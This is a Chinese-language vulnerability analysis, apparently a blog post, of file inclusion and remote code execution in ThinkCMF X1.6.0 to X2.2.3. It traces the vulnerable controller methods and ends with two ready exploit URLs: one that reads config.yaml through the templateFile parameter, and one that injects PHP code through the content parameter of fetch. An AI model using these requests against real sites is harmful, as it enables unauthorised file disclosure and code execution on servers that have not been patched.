ThinkCMF文件包含与远程代码执行分析

影响版本

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

本文使用2.2.3进行分析,下载链接:https://www.mycodes.net/45/7058.htm

代码分析

文件包含

首先来到默认控制器,位于\application\Portal\Controller\IndexController.class.php,代码如下

1

跟进HomebaseController控制器,其中存在许多public属性的方法,我们可以在前台直接调用,该处漏洞利用了display方法

2

该方法中的五个参数都是可控的,第一个参数被传入到了parseTemplate方法中,跟进该方法

3

如果文件存在,会直接返回文件名,在这里我们控制该参数为想包含的文件即可

代码执行

该处调用到了HomebaseController中的fetch方法,代码如下

5

该方法调用了父类中的fetch方法,跟进该方法

6

继续跟进

7

该处存在着代码执行的点,我们只要控制content的值即可

漏洞利用

文件包含

1
http://cmf.io/index.php?a=display&templateFile=config.yaml

8

命令执行

1
http://cmf.io/index.php?a=fetch&content=<?php phpinfo();exit();?>

9

注意要使用exit函数中段代码执行,否则不会进行输出

坚持原创技术分享,您的支持将鼓励我继续创作!